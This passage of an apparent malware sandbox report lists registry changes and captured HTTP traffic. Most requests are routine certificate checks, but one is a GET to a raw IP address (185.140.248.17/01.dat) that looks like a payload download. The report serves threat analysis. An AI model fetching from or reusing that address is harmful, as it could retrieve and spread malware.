498. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\UpdateAvailableCount",
499. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\UpdateAvailableSince",
500. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\LastChecked",
501. "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\PersistedPings\\{A4C39F19-AC6A-4AF4-9EF9-212DF42F10D1}",
502. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{A4C39F19-AC6A-4AF4-9EF9-212DF42F10D1}\\PersistedPingString",
503. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\PersistedPings\\{A4C39F19-AC6A-4AF4-9EF9-212DF42F10D1}\\PersistedPingTime",
504. "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState",
505. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState\\DownloadTimeRemainingMs",
506. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState\\DownloadProgressPercent",
507. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState\\StateValue",
508. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\BITS\\Performance\\PerfMMFileName",
509. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_LOG",
510. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_BAK"
511. ]
512.  
513. [*] Deleted Registry Keys: [
514. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
515. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
516. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
517. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
518. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\uid",
519. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\old-uid",
520. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\tttoken",
521. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\UpdateAvailableCount",
522. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\UpdateAvailableSince",
523. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\dr",
524. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\tttoken"
525. ]
526.  
527. [*] DNS Communications: []
528.  
529. [*] Domains: []
530.  
531. [*] Network Communication - ICMP: []
532.  
533. [*] Network Communication - HTTP: [
534. {
535. "count": 1,
536. "body": "",
537. "uri": "http://185.140.248.17/01.dat",
538. "user-agent": "",
539. "method": "GET",
540. "host": "185.140.248.17",
541. "version": "1.1",
542. "path": "/01.dat",
543. "data": "GET /01.dat HTTP/1.1\r\nHost: 185.140.248.17\r\nCache-Control: no-cache\r\n\r\n",
544. "port": 80
545. },
546. {
547. "count": 1,
548. "body": "",
549. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
550. "user-agent": "Microsoft-CryptoAPI/6.1",
551. "method": "GET",
552. "host": "ocsp.digicert.com",
553. "version": "1.1",
554. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
555. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 128165\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 11:02:13 GMT\r\nIf-None-Match: \"5c961235-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
556. "port": 80
557. },
558. {
559. "count": 1,
560. "body": "",
561. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
562. "user-agent": "Microsoft-CryptoAPI/6.1",
563. "method": "GET",
564. "host": "ocsp.digicert.com",
565. "version": "1.1",
566. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
567. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
568. "port": 80
569. },
570. {
571. "count": 1,
572. "body": "",
573. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
574. "user-agent": "Microsoft-CryptoAPI/6.1",
575. "method": "GET",
576. "host": "ocsp.digicert.com",
577. "version": "1.1",
578. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
579. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 143038\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 15:00:07 GMT\r\nIf-None-Match: \"5c9649f7-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
580. "port": 80
581. },
582. {
583. "count": 1,
584. "body": "",
585. "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D",
586. "user-agent": "Microsoft-CryptoAPI/6.1",
587. "method": "GET",
588. "host": "ocsp.pki.goog",
589. "version": "1.1",
590. "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D",
591. "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
592. "port": 80
593. },
594. {
595. "count": 1,
596. "body": "",
597. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D",
598. "user-agent": "Microsoft-CryptoAPI/6.1",
599. "method": "GET",
600. "host": "ocsp.digicert.com",
601. "version": "1.1",
602. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D",
603. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D HTTP/1.1\r\nCache-Control: max-age = 89056\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Mar 2019 18:30:24 GMT\r\nIf-None-Match: \"5c9529c0-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
604. "port": 80
605. },
606. {
607. "count": 1,
608. "body": "",
609. "uri": "http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl",
610. "user-agent": "Microsoft-CryptoAPI/6.1",
611. "method": "GET",
612. "host": "crl.microsoft.com",
613. "version": "1.1",
614. "path": "/pki/crl/products/MicrosoftTimeStampPCA.crl",
615. "data": "GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Feb 2019 02:02:49 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
616. "port": 80
617. },
618. {
619. "count": 1,
620. "body": "",
621. "uri": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D",
622. "user-agent": "Microsoft-CryptoAPI/6.1",
623. "method": "GET",
624. "host": "ocsp.comodoca.com",
625. "version": "1.1",
626. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D",
627. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D HTTP/1.1\r\nCache-Control: max-age = 94804\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Mon, 11 Mar 2019 04:19:13 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.comodoca.com\r\n\r\n",
628. "port": 80
629. },
630. {
631. "count": 1,
632. "body": "",
633. "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D",
634. "user-agent": "Microsoft-CryptoAPI/6.1",
635. "method": "GET",
636. "host": "ocsp.pki.goog",
637. "version": "1.1",
638. "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D",
639. "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
640. "port": 80
641. },
642. {
643. "count": 1,
644. "body": "",
645. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D",
646. "user-agent": "Microsoft-CryptoAPI/6.1",
647. "method": "GET",
648. "host": "ocsp.digicert.com",
649. "version": "1.1",
650. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D",
651. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D HTTP/1.1\r\nCache-Control: max-age = 108232\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Mar 2019 23:50:01 GMT\r\nIf-None-Match: \"5c9574a9-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
652. "port": 80
653. },
654. {
655. "count": 1,
656. "body": "",
657. "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
658. "user-agent": "Microsoft-CryptoAPI/6.1",
659. "method": "GET",
660. "host": "www.download.windowsupdate.com",
661. "version": "1.1",
662. "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
663. "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Feb 2019 16:53:13 GMT\r\nIf-None-Match: \"80e22c19cfcad41:0\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
664. "port": 80
665. },
666. {
667. "count": 1,
668. "body": "",
669. "uri": "http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
670. "user-agent": "Microsoft-CryptoAPI/6.1",
671. "method": "GET",
672. "host": "crl.microsoft.com",
673. "version": "1.1",
674. "path": "/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
675. "data": "GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 14 Feb 2019 06:01:18 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
676. "port": 80
677. },
678. {
679. "count": 1,
680. "body": "",
681. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D",
682. "user-agent": "Microsoft-CryptoAPI/6.1",
683. "method": "GET",
684. "host": "ocsp.digicert.com",
685. "version": "1.1",
686. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D",
687. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D HTTP/1.1\r\nCache-Control: max-age = 93156\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Mar 2019 04:40:45 GMT\r\nIf-None-Match: \"5c8c7e4d-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
688. "port": 80
689. },
690. {
691. "count": 1,
692. "body": "",
693. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D",
694. "user-agent": "Microsoft-CryptoAPI/6.1",
695. "method": "GET",
696. "host": "ocsp.digicert.com",
697. "version": "1.1",
698. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D",
699. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D HTTP/1.1\r\nCache-Control: max-age = 149079\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 11:10:47 GMT\r\nIf-None-Match: \"5c961437-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
700. "port": 80
701. },
702. {
703. "count": 1,
704. "body": "",
705. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D",
706. "user-agent": "Microsoft-CryptoAPI/6.1",
707. "method": "GET",
708. "host": "ocsp.digicert.com",
709. "version": "1.1",
710. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D",
711. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D HTTP/1.1\r\nCache-Control: max-age = 148251\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Mar 2019 18:10:24 GMT\r\nIf-None-Match: \"5c8d3c10-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
712. "port": 80
713. },
714. {
715. "count": 1,
716. "body": "",
717. "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D",
718. "user-agent": "Microsoft-CryptoAPI/6.1",
719. "method": "GET",
720. "host": "ocsp.pki.goog",
721. "version": "1.1",
722. "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D",
723. "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
724. "port": 80
725. },
726. {
727. "count": 1,
728. "body": "",
729. "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D",
730. "user-agent": "Microsoft-CryptoAPI/6.1",
731. "method": "GET",
732. "host": "ocsp.pki.goog",
733. "version": "1.1",
734. "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D",
735. "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
736. "port": 80
737. },
738. {
739. "count": 1,
740. "body": "",
741. "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D",
742. "user-agent": "Microsoft-CryptoAPI/6.1",
743. "method": "GET",
744. "host": "ocsp.digicert.com",
745. "version": "1.1",
746. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D",
747. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D HTTP/1.1\r\nCache-Control: max-age = 126990\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 10:41:16 GMT\r\nIf-None-Match: \"5c960d4c-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
748. "port": 80
749. },
750. {
751. "count": 1,
752. "body": "",
753. "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D",
754. "user-agent": "Microsoft-CryptoAPI/6.1",
755. "method": "GET",
756. "host": "ocsp.pki.goog",
757. "version": "1.1",
758. "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D",
759. "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
760. "port": 80
761. },
762. {
763. "count": 1,
764. "body": "",
765. "uri": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D",
766. "user-agent": "Microsoft-CryptoAPI/6.1",
767. "method": "GET",
768. "host": "ocsp.msocsp.com",
769. "version": "1.1",
770. "path": "/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D",
771. "data": "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 17:46:18 GMT\r\nIf-None-Match: \"dd54d75d4688b8dc62b087df4e04af258704c48b\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.msocsp.com\r\n\r\n",
772. "port": 80
773. },
774. {
775. "count": 1,
776. "body": "",
777. "uri": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D",
778. "user-agent": "Microsoft-CryptoAPI/6.1",
779. "method": "GET",
780. "host": "ocsp.thawte.com",
781. "version": "1.1",
782. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D",
783. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D HTTP/1.1\r\nCache-Control: max-age = 320712\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Wed, 20 Mar 2019 11:42:01 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.thawte.com\r\n\r\n",
784. "port": 80
785. },
786. {
787. "count": 1,
788. "body": "",
789. "uri": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
790. "user-agent": "Microsoft-CryptoAPI/6.1",
791. "method": "GET",
792. "host": "ocsp.usertrust.com",
793. "version": "1.1",
794. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
795. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D HTTP/1.1\r\nCache-Control: max-age = 94765\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Mon, 11 Mar 2019 04:19:13 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.usertrust.com\r\n\r\n",
796. "port": 80
797. },
798. {
799. "count": 1,
800. "body": "",
801. "uri": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D",
802. "user-agent": "Microsoft-CryptoAPI/6.1",
803. "method": "GET",
804. "host": "th.symcd.com",
805. "version": "1.1",
806. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D",
